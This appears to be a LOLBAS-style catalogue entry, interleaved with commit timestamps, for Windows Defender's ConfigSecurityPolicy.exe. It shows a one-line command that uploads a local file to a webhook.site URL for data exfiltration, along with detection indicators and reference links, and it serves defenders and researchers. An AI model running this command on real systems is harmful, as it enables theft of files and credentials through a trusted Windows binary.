2020-09-04 12:54:44 +02:00
---
Name : ConfigSecurityPolicy.exe
Description : Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
Author : 'Ialle Teixeira'
2021-01-10 16:04:52 +01:00
Created : 2020-09-04
2020-09-04 12:54:44 +02:00
Commands :
- Command : ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
Description : Upload file, credentials or data exfiltration in general
Usecase : Upload file
Category : Upload
Privileges : User
MitreID : T1567
OperatingSystem : Windows 10
Full_Path :
- Path : C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
2021-01-10 16:04:52 +01:00
Code_Sample :
- Code :
Detection :
2020-09-04 12:54:44 +02:00
- IOC : ConfigSecurityPolicy storing data into alternate data streams.
- IOC : Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS.
- IOC : Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe.
- IOC : User Agent is "MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
Resources :
- Link : https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads
- Link : https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads
- Link : https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor
2020-10-23 02:38:50 +02:00
- Link : https://twitter.com/NtSetDefault/status/1302589153570365440?s=20
2020-09-04 12:54:44 +02:00
Acknowledgement :
- Person : Ialle Teixeira
Handle : '@NtSetDefault'
---